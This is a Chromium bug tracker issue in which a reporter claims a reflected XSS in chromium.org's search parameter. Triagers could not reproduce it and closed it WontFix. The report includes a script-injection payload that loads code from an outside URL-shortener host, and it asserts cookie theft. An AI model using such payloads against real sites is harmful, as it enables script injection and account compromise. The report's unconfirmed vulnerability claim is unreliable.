New issue
Advanced search Search tips

Issue 724796 link

Starred by 1 user

Issue metadata

Status: WontFix
Owner: ----
Closed: May 2017
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security



Sign in to add a comment

Security: Google's http://www.chromium.org Reflected XSS

Reported by amanmahe...@gmail.com, May 20 2017

Issue description

I have found that http://www.chromium.org application is vulnerable to Reflected Cross site Scripting attack as s parameter of this applications following Url http://www.chromium.org/?s=test is used for inputting an searching but as there is no proper input validation, filtration or sanitation on server side nor there is any output encoding etc to prevent this Reflected Cross site Scripting Vulnerability if the attacker uses the cross domain XSS payload with the combination of comments. So the attacker easily can steal the cookies(as http only cookie attribute missing) of any of those website users and can easily compromise there account.

Original XSS Vulnerable Url(Reflected XSS Via GET & POST Requests while searching & by Injecting the XSS Payload in Search field):
http://www.chromium.org/?s=test



Crafted XSS Vulnerable Url:
http://www.chromium.org/?s="><script src=//goo.gl/p2yht/><!--

XSS Payloads: "><script src=//goo.gl/p2yht/><!--

Vulnerable Parameter: s

VERSION
Chrome Version: [57.029] + [stable]
Operating System: [Windows 10]

 
aef.jpg
205 KB View Download
Labels: Needs-Feedback
I'm not able to reproduce any problem with this URL, and no XSS is obvious in the screenshot either. Can you please provide more details and/or a screenshot showing script execution?

Comment 2 by tsepez@chromium.org, May 22 2017

Also, do you have any extensions installed?  If so, can you try it with the extensions disabled?  In the past we've seen extentions re-write pages so as to make them unsafe.

Comment 3 by kenrb@chromium.org, May 29 2017

Status: WontFix (was: Unconfirmed)
Project Member

Comment 4 by sheriffbot@chromium.org, Sep 4 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment